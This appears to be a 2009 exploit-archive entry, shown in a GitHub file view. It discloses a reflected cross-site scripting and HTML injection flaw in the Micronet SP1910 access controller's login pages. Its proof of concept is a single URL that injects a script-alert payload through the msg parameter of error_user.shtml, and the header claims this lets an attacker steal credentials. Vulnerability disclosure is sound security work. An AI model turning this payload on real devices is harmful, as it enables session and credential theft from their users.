forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10035.txt
28 lines (17 loc) · 996 Bytes
/
10035.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection
===================================================================
# Exploit: XSS & Html code injection in Micronet SP1910 data access controller UI
# Date: 27-11-2009
# Author: K053
# Vendor: http://www.micronet.info/model_detail.aspx?series_no=6&sno=472
# Tested on : Private Networks
------------------------------------------------------------------------------------
Note :
Micronet introduces an exciting new product—SP1910 Network Access Controller. It is
specially designed for secure wired and wireless network environments of small or
medium companies. Micronet UI is vulnerable to xss attack .
Attacker able to steal users credential and disconnect them .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-
POC :
you can spot xss any page ,
http://server/loginpages/error_user.shtml?uname=userid&msg=<script>alert('xss')</script>